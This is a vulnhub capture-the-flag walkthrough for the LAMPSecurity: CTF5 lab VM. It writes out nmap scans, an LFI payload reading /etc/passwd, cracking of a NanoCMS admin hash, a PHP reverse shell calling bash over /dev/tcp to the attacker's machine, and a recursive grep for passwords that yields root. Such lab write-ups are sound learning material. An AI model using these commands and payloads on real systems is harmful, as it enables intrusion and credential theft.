LAMPSecurity: CTF5 – vulnhub walkthrough

• VM: LAMPSecurity: CTF5
• Goal: Gain root access
• Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254

Port Scanning

nmap -p- -A 192.168.172.240

• Port 22: OpenSSH 4.7
• Port 25: SMTP
• Port 80: Apache httpd 2.2.6
• Port 110: pop3 ipop3d 2006k.101
• Port 111: RPC #100000
• Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
• Port 143: University of Washington IMAP imapd 2006k.396
• Port 445: Samba 3.0.26a-6.fc8
• Port 901: Samba SWAT administration server
• Port 3306: MySQL 5.0.45

Enumeration

There’s quite a few ports open. First let’s check out the website.

I test around the site against SQL injection but didn’t find any.

Then identified LFI (local file inclusion) vulnerability against the page parameter.

http://192.168.172.240?page=../../../../etc/passwd%00

Further checking the website shows that the website is using NanoCMS for Blogging (Blog tab).

Google about NanoCMS vulnerability quickly showed /data/pagesdata.txt exposes password hash. Try on the website and returned the file with password hash.

http://192.168.172.240/~andy/data/pagesdata.txt

username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd

The hash has 32 hex characters so most likely MD5 hash.I use website md5decrypt.net and is able to find the password quickly: shannon

username: admin,    password: shannon

Exploitation

All right. Good start. Let’s try to login at the Admin Login of Andy’s Blog page. And sure enough, login successfully to the NanoCMS Admin Panel.

I look around the Admin Panel and quickly spot something very interesting: ‘New Page‘. Looks like I can create new blog pages there. I quickly create a new blog page with simple php code to test if php code execution is allowed.

I added the Page and then click on new blog page ‘Testing‘ at Pages & Options.

Awesome. Php code execution is allowed.

Limited Shell

We can use php code execution to create a reverse shell. First start Netcat at kali box to listen to port 4444:

nc -lp 4444

Then modify the Testing blog page content to: (note: kali box ip address is 192.168.172.110)

<?php
system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1");
?>

Now refresh the Testing blog page again and observe the kali box:

That’s great. We got a shell access as user apache

Privilege Escalation

With shell access, we search around the system looking for useful information to gain root access. That include sudo usage, setuid commands, configuration files & users’ files.

Luckily, we come across the root password while searching for password recursively in /home directory using the following search command:

grep -R -i password /home/* 2> /dev/null

Looks like the .note file in patrick’s folder may have root password.

cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

Root password: 50$cent

Let’s try it out

Bingo! Root access.

Thank you Author madirish2600 for the box LAMPSecurity: CTF5